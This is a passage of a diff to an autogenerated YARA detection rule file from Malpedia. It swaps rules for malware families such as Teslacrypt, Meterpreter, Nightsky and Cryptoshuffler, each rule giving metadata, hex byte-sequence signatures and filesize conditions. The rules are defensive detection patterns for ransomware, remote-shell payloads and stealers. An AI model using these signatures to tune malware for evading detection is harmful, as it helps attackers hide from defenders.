"204f6818406ce562647f2b4540c54737aa88569de9afd450b681fd9a49a46e00" + logic_hash = "e6299dacb3891024e6699f166db0ecba511abe3e26d2cc6dc9ddd0929ba5121a" score = 75 quality = 75 tags = "FILE" @@ -163442,38 +166238,32 @@ rule MALPEDIA_Win_Teslacrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 31f7 897d24 31f9 894d28 31ca 89552c 89d0 } - $sequence_1 = { 334534 894554 334538 894558 } - $sequence_2 = { 3345f8 894518 3345fc 89451c 51 52 89f2 } - $sequence_3 = { 0f8452030000 81ffc0000000 0f84ac010000 81ffe0000000 740a b8ffffffff } - $sequence_4 = { 31f7 897d44 31f9 894d48 31ca } - $sequence_5 = { 334538 894558 33453c 89455c 51 52 89f2 } - $sequence_6 = { 31f7 897d04 31f9 894d08 } - $sequence_7 = { 335d04 334d08 33550c 81ffa0000000 0f8456030000 } - $sequence_8 = { 0f842d010000 8b44243c 8b08 83f900 894c2430 741f 8b442464 } - $sequence_9 = { 8b4c2430 01c8 8b542474 8b742470 031406 891406 } - $sequence_10 = { 890c24 e8???????? 8d0dc1304b00 8b542410 894208 890c24 } - $sequence_11 = { 8902 83f800 894c2408 7432 8b442418 83c004 } - $sequence_12 = { 31c0 8b4c2414 29c8 8b54240c 21c2 01ca 89542408 } - $sequence_13 = { b801000000 8b4c245c 8b9180000000 8b742464 01d6 8b7c2464 8b54170c } - $sequence_14 = { c70100000000 c7410c00000000 c7410800000000 8b0d???????? 8b4920 8b742450 8b7a38 } - $sequence_15 = { 8b5120 89e6 8d7c2468 897e0c } + $sequence_0 = { b748 00ee 0be6 3bf6 2014dd33b89819 220f } + $sequence_1 = { 0fb7485e 83e954 8b55f8 66894a5e } + $sequence_2 = { fc b802ec0000 8d6825 94 01dc 00e8 45 } + $sequence_3 = { b802ec0000 8d6825 94 01dc 00e8 45 } + $sequence_4 = { ec 7ac4 f8 ae fc } + $sequence_5 = { 32705b 39e1 108792ff9b95 8abf2ec8650b } + $sequence_6 = { 1a00 0071bf 7303 1f c8be8de8 1be8 692405008008202c00700d } + $sequence_7 = { 66894118 8b55f8 0fb74218 83e854 8b4df8 66894118 ba8d000000 } + $sequence_8 = { 2cbe 832061 5b 5b } + $sequence_9 = { 30ac06e68bfc49 23f7 b754 7c49 27 59 } condition: - 7 of them and filesize <1187840 + 7 of them and filesize <2677760 } -rule MALPEDIA_Win_Erebus_Auto : FILE +rule MALPEDIA_Win_Unidentified_006_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3b8e48a2-ab39-5161-a03c-847ada2f2257" + id = "1d29f273-95a4-58bd-87cd-6ac677036b5c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.erebus_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_006_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "f6199452e86aabb91b90d01b525d7eacea470d9b218c6e5261dcc5c5c7e57399" + logic_hash = "dd723dd2c53afa22a9c28d9c9c06ec724a63cc0cfcf78b59a425b4cdf0fd8bc1" score = 75 quality = 75 tags = "FILE" @@ -163487,32 +166277,32 @@ rule MALPEDIA_Win_Erebus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c243c 50 c744245000000000 e8???????? 8d742434 bb01000000 eb53 } - $sequence_1 = { ff15???????? 8b4514 8918 8bc7 5f 5b 8be5 } - $sequence_2 = { 8d45f0 50 8b8540ffffff 8d8d40ffffff 8b4004 03c8 e8???????? } - $sequence_3 = { ff4718 40 ff7718 25ffff0000 50 68???????? 56 } - $sequence_4 = { 8d0c2a 894f18 740a 8b4704 034708 3bc8 7506 } - $sequence_5 = { 8d4c2418 e8???????? 50 b9???????? c64424302e e8???????? c705????????24215000 } - $sequence_6 = { 50 57 53 e8???????? 83c418 8b8c2424020000 64890d00000000 } - $sequence_7 = { c74704ffffffff c74710ffffffff c74714ffffffff 8b0f 8b4704 83f9ff 7504 } - $sequence_8 = { 8bd0 c645fc1e 8d8d18ffffff e8???????? 8bf0 83c404 81fe???????? } - $sequence_9 = { 2b4718 034708 8b5710 0faf570c 3903 89442410 8d442414 } + $sequence_0 = { 3907 7417 833e00 7408 ff36 e8???????? 59 } + $sequence_1 = { 6a00 8d45fc 897dfc 50 8d45f8 50 6a00 } + $sequence_2 = { 85c9 7410 8b55f4 85d2 7409 e8???????? 894708 } + $sequence_3 = { 8bf0 57 56 e8???????? 83c410 33c0 } + $sequence_4 = { 85f6 7410 57 8b7d0c 2bf8 } + $sequence_5 = { 0fb6875c204000 47 03c6 83c603 25ff000000 } + $sequence_6 = { eb45 8b7510 85f6 743c } + $sequence_7 = { 8b4dfc 83c40c 8bf7 8bd7 85c9 7421 83ff0c } + $sequence_8 = { 33ff 53 ff15???????? 53 ff15???????? } + $sequence_9 = { 57 6a40 8bc2 33ff 6800300000 50 } condition: - 7 of them and filesize <2564096 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Meterpreter_Auto : FILE +rule MALPEDIA_Win_Nightsky_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "94296578-89d7-5d7b-b7e4-efe037d64332" + id = "8aa7bf90-2e66-55fa-ac44-1eeed72fb6ec" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meterpreter_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nightsky_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "71f865d4008295f79c7afc49beb427fb0376821d7b27897466868baff3347cd2" + logic_hash = "e63cd2d4ab9373a42087ae988b3e3adac99eadab50dc02b0732a77e7f3626d28" score = 75 quality = 75 tags = "FILE" @@ -163526,32 +166316,32 @@ rule MALPEDIA_Win_Meterpreter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec dcec 088b55895356 108b3a85ff89 7dfc 750e } - $sequence_1 = { fc b8c0150000 8b7508 33e5 257e040275 238b1d6a016a 006a00 } - $sequence_2 = { f1 57 52 bc40e84fff 38ff 83db14 5f } - $sequence_3 = { 314319 034319 83ebfc 0acb } - $sequence_4 = { 0000 68ffff0000 52 ffd7 8b2410 } - $sequence_5 = { 8be5 5d c27f00 8d4df4 8d55ec } - $sequence_6 = { 51 6a00 6a00 37 0052bf 15???????? 85c0 } - $sequence_7 = { 8b451c 8d07 a4 52 8d4d18 50 } - $sequence_8 = { 41 00ff 15???????? 33c0 c3 7790 55 } - $sequence_9 = { 83ec08 53 8b4708 57 33ff 85db } + $sequence_0 = { 420fb68c1210ab0400 c1e108 0bc8 420fb6841212ab0400 } + $sequence_1 = { 4150 4d0fabe0 66442bc5 311424 6641d3e0 4158 4863d2 } + $sequence_2 = { 4883ec48 488364243000 8364242800 41b803000000 488d0dc0460000 4533c9 ba00000040 } + $sequence_3 = { 5f c3 488d05cf110000 48b90000000000000080 488987c8000000 488d0557990200 } + $sequence_4 = { e8???????? 488d15d92c0100 41b804010000 33c9 c605????????00 ff15???????? } + $sequence_5 = { 488d15d4be0000 41b898000000 498bd9 e8???????? 488b8424d0050000 488b9424e8050000 } + $sequence_6 = { e41d 1a5b5f a9b7f95f5f b8cbaa75cc d113 0ae4 } + $sequence_7 = { 0f8c96000000 3b1d???????? 0f838a000000 488bf3 4c8be3 49c1fc05 4c8d2d7e190100 } + $sequence_8 = { 488d0d0fda0000 480f45cf 48894b48 e8???????? eb17 4885ff 488d0dead90000 } + $sequence_9 = { 4883ec28 4c8bc1 4c8d0d52bbfdff 498bc9 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <19536896 } -rule MALPEDIA_Win_Socksbot_Auto : FILE +rule MALPEDIA_Win_Mapiget_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9bcf8cfe-6674-56a4-ae23-27a14bd76431" + id = "51e9978a-f3a2-5a57-b2db-e31705d960d6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socksbot_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mapiget_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "751966a23ad60ac8819a9938a949afcb7d6a09a99a37898a0110d849f807b7bf" + logic_hash = "0c633dd4b3de0327e913721fdea6a98365647ad6509020036346423432ca814a" score = 75 quality = 75 tags = "FILE" @@ -163565,32 +166355,32 @@ rule MALPEDIA_Win_Socksbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a50 ff7508 33f6 8975fc e8???????? 8bd8 59 } - $sequence_1 = { 59 e9???????? 55 8bec ff4d0c 7509 ff7508 } - $sequence_2 = { 46 8a1c39 41 3b4d0c 7cce 5f 8935???????? } - $sequence_3 = { 6a00 ff7508 6a03 e8???????? 83c410 ff7704 } - $sequence_4 = { 48 741b 48 7536 53 } - $sequence_5 = { e8???????? 8bd8 8b45fc 8945f0 83c008 } - $sequence_6 = { 8b75fc 53 ff15???????? 57 e8???????? } - $sequence_7 = { 75ed ff7508 6bc94c 8b5dfc 03cf 51 53 } - $sequence_8 = { 8a0c37 880e 4a 75f7 } - $sequence_9 = { 81c60c000100 4b 75d2 68???????? ff15???????? a0???????? } + $sequence_0 = { 773c 33d2 8a9178154000 ff24956c154000 6683780400 } + $sequence_1 = { 75f4 8d0c49 5e 8d0c8dd8ea4000 3bc1 } + $sequence_2 = { 52 e8???????? 83c404 6683bc456effffff0a 7517 8d8570ffffff } + $sequence_3 = { 8d95f0f9ffff 6800020000 52 e8???????? 83c40c 85c0 0f84c1010000 } + $sequence_4 = { 741e 8bc7 8bcf c1f805 83e11f 8b048520174100 8d04c8 } + $sequence_5 = { e8???????? 8b54240c 83c408 52 } + $sequence_6 = { 8d85f0feffff 8d8d70ffffff 50 8d95f0fdffff } + $sequence_7 = { 85c0 7520 8d8df0f9ffff 8d95f0fdffff 51 52 } + $sequence_8 = { 83c404 3bf7 0f846bfdffff 56 } + $sequence_9 = { c705????????0d000000 c3 8b04d5540c4100 a3???????? c3 81f9bc000000 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Mebromi_Auto : FILE +rule MALPEDIA_Win_Tellyouthepass_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e0d98380-a60b-51d2-98f3-302d440340e7" + id = "2f59ff80-ce55-5261-bc1e-9b9085ba348c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mebromi_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tellyouthepass_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4361b37a1cf79aacd380ae78b2f2e74bbc44d101b09510c6583cf0529e44be88" + logic_hash = "e0931a30828c9c1e2a42766d85093d9ba189ed49cc692d748a9e549b96d308d1" score = 75 quality = 75 tags = "FILE" @@ -163604,34 +166394,34 @@ rule MALPEDIA_Win_Mebromi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 743a 837d0800 742e 85f6 7419 0fb6da f68301a0290004 } - $sequence_1 = { 68ff010f00 68???????? ff742410 ff15???????? 8bf0 85f6 7416 } - $sequence_2 = { 7714 8b55fc 8a9270722900 089001a02900 } - $sequence_3 = { 683f000f00 55 55 ff15???????? 8bf0 e8???????? 56 } - $sequence_4 = { 48 750c e8???????? eb05 e8???????? 6a01 } - $sequence_5 = { 0fb6fa 3bc7 7714 8b55fc 8a9270722900 089001a02900 } - $sequence_6 = { 2c29 0000 2d29008a46 0323 d18847034ec1 e9???????? } - $sequence_7 = { 0fb6d2 f68201a0290004 740c ff01 } - $sequence_8 = { aa 8d9e88722900 803b00 8bcb 742c 8a5101 84d2 } - $sequence_9 = { 50 6a01 56 ff15???????? 56 8bf8 ff15???????? } + $sequence_0 = { 4c895c2438 48895c2430 e8???????? 488d05e4021a00 bb1d000000 e8???????? 488b442450 } + $sequence_1 = { 488d05a4bf1700 bb13000000 0f1f440000 e8???????? 8b442414 89c0 e8???????? } + $sequence_2 = { e8???????? 488b442428 e8???????? 488d0509dd1700 bb07000000 e8???????? 488b442420 } + $sequence_3 = { e9???????? 488d05231a3400 31db 488b6c2458 4883c460 c3 48895c2470 } + $sequence_4 = { 7506 48894208 eb09 488d7a08 e8???????? 488bac24f8000000 4881c400010000 } + $sequence_5 = { c3 440fb6ac24080a0000 4584ed 0f8471030000 4983fc07 0f85aa010000 4c8b4828 } + $sequence_6 = { e8???????? e8???????? 488b4818 488b5820 488b5028 4889c8 4889d1 } + $sequence_7 = { 498d7a78 e8???????? 498b9050010000 498b9858010000 498bb060010000 49899a98000000 4989b2a0000000 } + $sequence_8 = { 84c0 0f8566feffff 31c0 488b6c2418 4883c420 c3 31c0 } + $sequence_9 = { 0f1f00 e8???????? 31db 31c9 488d3d501c0c00 4889c6 31c0 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <7152640 } -rule MALPEDIA_Win_Darkloader_Auto : FILE +rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "601e152a-7554-5605-b5d8-66c528809ef1" + id = "04846f99-89cf-54cb-88bc-877d2656a7fa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkloader_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoshuffler_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "3bce0c9d521648c67df3e1e758ce6a8ac769bd1d815dcd4dfd750767fac4bfe8" + logic_hash = "1d3d096bc8fe94bfe59d829c11ff29d324542295a6195d59ed4b925f302177ea" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163643,73 +166433,73 @@ rule MALPEDIA_Win_Darkloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bb42434020000 c1e607 68???????? 89b42438020000 8dbe10a10010 } - $sequence_1 = { c70424???????? e8???????? c70424???????? 8bf8 56 e8???????? } - $sequence_2 = { 51 ff36 8b00 8b00 8986b0010000 ff96bc010000 } - $sequence_3 = { 57 ff74241c e8???????? 03c3 0fb73470 } - $sequence_4 = { 3c5f 7447 3c2e 7443 3c7e } - $sequence_5 = { 8b7c240c 8bcf 8906 8d5101 8a01 41 84c0 } - $sequence_6 = { 84c0 740b 80f90d 7519 } - $sequence_7 = { 894c241c 85c9 0f84b3000000 8b4020 } - $sequence_8 = { 6bc503 40 50 e8???????? be???????? 8d7c2418 } - $sequence_9 = { 83c428 50 6a40 6a05 53 ffd6 } + $sequence_0 = { 03fb e8???????? 8bf0 3b35???????? 7430 } + $sequence_1 = { 83c408 85c0 0f8496040000 6aff 6a00 8d442430 50 } + $sequence_2 = { 6bc830 8b049578f60210 f644082801 7421 57 } + $sequence_3 = { 0f57c0 c78424f400000000000000 68???????? 8d8c24e8000000 0f298424e8000000 e8???????? } + $sequence_4 = { c745ec10f80010 894df8 8945fc 64a100000000 8945e8 } + $sequence_5 = { e9???????? c745dc03000000 eb7c c745e0e04d0210 ebbb } + $sequence_6 = { 50 ff15???????? 8d842410030000 50 8d84248c010000 50 } + $sequence_7 = { e8???????? 8904bd78f60210 85c0 7514 6a0c } + $sequence_8 = { 0f851b010000 8b01 c6400c01 8b31 c6410c00 } + $sequence_9 = { 0f1f4000 8b06 8b4e08 3bc1 } condition: - 7 of them and filesize <124928 + 7 of them and filesize <425984 } -rule MALPEDIA_Win_Ati_Agent_Auto : FILE +rule MALPEDIA_Win_Pvzout_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aa24ad24-7301-5b4c-b856-1e1a4ef6bc2f" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ati_agent_auto.yar#L1-L120" + id = "bc80d9fe-85e4-55f8-8d8b-08382557b556" + date = "2023-01-25" + modified = "2023-01-26" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pvzout_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "724a5b5da348b3df222a7dbd0e29ff96d89b57311395a8ccd89f777e74414508" + logic_hash = "3b1eb492455f147bf0fe300cd3d173313439f65c62c0ebecede0fab8aacab139" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230124" + malpedia_hash = "2ee0eebba83dce3d019a90519f2f972c0fcf9686" + malpedia_version = "20230125" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488bc8 ff15???????? 488d1548a20000 488bce 488905???????? } - $sequence_1 = { e8???????? 488d2d24a60000 4c8d250dd80000 83f8ff 7435 488bcf e8???????? } - $sequence_2 = { 488d442460 488d942490010000 4533c9 4889442448 48894c2440 } - $sequence_3 = { 488b05???????? 4833c4 4889442438 498bf0 488bfa 488bd9 } - $sequence_4 = { 488d0526d80000 488d0cc8 48890f ff15???????? } - $sequence_5 = { e9???????? 4881ec28050000 488b05???????? 4833c4 4889842410050000 488b05???????? 4885c0 } - $sequence_6 = { 488d8c24f0000000 ba04010000 4889442420 e8???????? 4c8d5c2438 488d9424f0000000 41b919010200 } - $sequence_7 = { 442bc0 488b442450 488d0d85be0000 488b0cc1 } - $sequence_8 = { 897c2428 897c2420 c784248000000068000000 ff15???????? } - $sequence_9 = { 8bf8 85c0 750d 488bce e8???????? e9???????? 4c8d2d6dc10000 } + $sequence_0 = { 3e3f 19e9 73f8 dca10ebd24e8 252b0026cb } + $sequence_1 = { 5a bf95f6810e 75a8 43 1dea50873a d4a1 } + $sequence_2 = { 9c b3d7 5a bf95f6810e 75a8 } + $sequence_3 = { bbedffffff 03dd 81eb00d00200 83bd8804000000 899d88040000 } + $sequence_4 = { 3089f33d80f3 48 e21c 3e3f } + $sequence_5 = { 5d bbedffffff 03dd 81eb00d00200 83bd8804000000 } + $sequence_6 = { 03dd 81eb00d00200 83bd8804000000 899d88040000 } + $sequence_7 = { d4a1 0e 75a8 43 } + $sequence_8 = { 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 8d8594040000 50 } + $sequence_9 = { 5a bf95f6810e 75a8 43 1dea50873a d4a1 0e } condition: - 7 of them and filesize <172032 + 7 of them and filesize <573440 } -rule MALPEDIA_Win_W32Times_Auto : FILE +rule MALPEDIA_Win_Darkloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0bfdc72d-d05e-5c1b-8705-7d1b1a1a85f1" + id = "601e152a-7554-5605-b5d8-66c528809ef1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.w32times_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkloader_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "09784a57b734a06db72c3b3952721b8e38cad13da9a478a5c4cffbebd654009b" + logic_hash = "3bce0c9d521648c67df3e1e758ce6a8ac769bd1d815dcd4dfd750767fac4bfe8" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163721,32 +166511,32 @@ rule MALPEDIA_Win_W32Times_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 85c0 0f8487030000 6a01 68???????? } - $sequence_1 = { 83e103 f3a4 8b35???????? 8d8c24f0020000 68???????? 51 ffd6 } - $sequence_2 = { 83c408 68???????? ff15???????? 85c0 0f85c6060000 ff15???????? } - $sequence_3 = { ff15???????? 68???????? ff15???????? 396c2418 7410 6a01 } - $sequence_4 = { 3b9c24000d0000 0f84cc090000 8a8424f0020000 84c0 0f84bd090000 8a8424e8000000 84c0 } - $sequence_5 = { 8bfd 83c9ff 33c0 8d9424ec010000 f2ae f7d1 2bf9 } - $sequence_6 = { 8b15???????? 52 ffd3 892d???????? a1???????? 3bc5 7416 } - $sequence_7 = { f3a5 8bcd 8d9424f4030000 83e103 f3a4 8dbc24f4040000 } - $sequence_8 = { 683f000f00 6a00 56 ff15???????? 8bf8 } - $sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 } + $sequence_0 = { e8???????? 8bb42434020000 c1e607 68???????? 89b42438020000 8dbe10a10010 } + $sequence_1 = { c70424???????? e8???????? c70424???????? 8bf8 56 e8???????? } + $sequence_2 = { 51 ff36 8b00 8b00 8986b0010000 ff96bc010000 } + $sequence_3 = { 57 ff74241c e8???????? 03c3 0fb73470 } + $sequence_4 = { 3c5f 7447 3c2e 7443 3c7e } + $sequence_5 = { 8b7c240c 8bcf 8906 8d5101 8a01 41 84c0 } + $sequence_6 = { 84c0 740b 80f90d 7519 } + $sequence_7 = { 894c241c 85c9 0f84b3000000 8b4020 } + $sequence_8 = { 6bc503 40 50 e8???????? be???????? 8d7c2418 } + $sequence_9 = { 83c428 50 6a40 6a05 53 ffd6 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <124928 } -rule MALPEDIA_Win_Bundestrojaner_Auto : FILE +rule MALPEDIA_Win_Soundbite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f8dcad82-5285-5492-8b50-3aca915a7d86" + id = "080e0f3d-446d-56c0-ac80-bd020f7550e1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bundestrojaner_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soundbite_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "14c57bb4c31bed67bf98bb86f0286f3377181b876957cd1f8d67f51314c230ea" + logic_hash = "dd4f6a00eb49b6e49c1bd5e71a528f06fe40aa9dfa91442cca75ad1ce88ee58a" score = 75 quality = 75 tags = "FILE" @@ -163760,71 +166550,71 @@ rule MALPEDIA_Win_Bundestrojaner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894c2414 33ff 85c0 897c2410 741f 47 d1f8 } - $sequence_1 = { 3bc8 7cc3 8b5608 8b4e70 d9442460 42 897e04 } - $sequence_2 = { 50 8d55fc 51 52 e8???????? 8b87c0000000 b980000000 } - $sequence_3 = { 56 8b742438 57 8b7c242c 8bc7 c744241000000000 } - $sequence_4 = { 8b4e34 8d1482 52 50 8b460c 50 51 } - $sequence_5 = { 83c420 8b5104 85d2 0f95c2 83f806 885114 } - $sequence_6 = { d9c9 d959fc 3b5610 7cdb ddd8 8b4610 8b5c2418 } - $sequence_7 = { 75fb 83fe0b 7e15 8b442414 50 8b08 c7411406000000 } - $sequence_8 = { 8d54241c 89442420 8b44240c 6a00 52 6a00 } - $sequence_9 = { dd1c24 e8???????? 83c408 e8???????? 85c0 8944241c 7d04 } + $sequence_0 = { 8b5518 48 89451c 8b4a08 3bc8 7702 2bc1 } + $sequence_1 = { c1e81f 8d4c02ff 398dd4fcffff 7d1f } + $sequence_2 = { ff15???????? 8a4e02 8066030f 0fb7c0 240f 02c0 02c0 } + $sequence_3 = { e8???????? 83c428 8d7de0 e8???????? 8b450c 8b4d18 8b5514 } + $sequence_4 = { c745f0c4e9f2e5 c745f4e3f4eff2 66c745f8f900 894dc0 c745c4d3ffc8ff c745c8c5ffccff c745ccccffb3ff } + $sequence_5 = { 49 894d18 3bc1 7437 8b7d14 8b5708 } + $sequence_6 = { 8b4d08 8b550c 8d0411 83f802 } + $sequence_7 = { 7702 2bc2 8b5104 8b3c82 8b4d2c 8b5528 51 } + $sequence_8 = { 68???????? ff15???????? 8b7508 c7465ca0634200 83660800 33ff 47 } + $sequence_9 = { 8d75a0 e8???????? 8b5da0 8b4da4 8bc3 2bc1 } condition: - 7 of them and filesize <729088 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Solarbot_Auto : FILE +rule MALPEDIA_Win_Unidentified_073_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e3c74e1-0da4-57ab-ab5f-74e62e2d1f7c" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.solarbot_auto.yar#L1-L115" + id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26" + date = "2022-08-05" + modified = "2022-08-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_073_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "2b058f45b0c5077e371ef262d327c05a0be6ae89bd9fed8f4379a07e0dfd6a86" + logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20220805" + malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71" + malpedia_version = "20220808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8407feffff bb01000000 4b 90 43 8b854cfeffff } - $sequence_1 = { 50 8d8500fcffff 50 6a00 } - $sequence_2 = { 85db 7463 ff75f8 e8???????? 84c0 7457 } - $sequence_3 = { 8d85f4fdffff 50 e8???????? 6a0c 8d85e8fdffff 50 e8???????? } - $sequence_4 = { 50 e8???????? 680c010000 8d85f4faffff } - $sequence_5 = { 8b4508 8945cc 8b7d0c 8b4510 } - $sequence_6 = { 53 e8???????? 83fe0c 7509 ff75f0 } - $sequence_7 = { 85c0 0f847d000000 ff75f4 e8???????? } - $sequence_8 = { c645c401 eb23 6a00 6a00 6a00 } - $sequence_9 = { 83c040 8985e4fdffff 8b85e0fdffff 0385d0fdffff 8b583c 83bdccfdffff0c } + $sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce } + $sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff } + $sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 } + $sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 } + $sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 } + $sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 } + $sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c } + $sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? } + $sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 } + $sequence_9 = { 57 6aff 68???????? 50 ff15???????? } condition: - 7 of them and 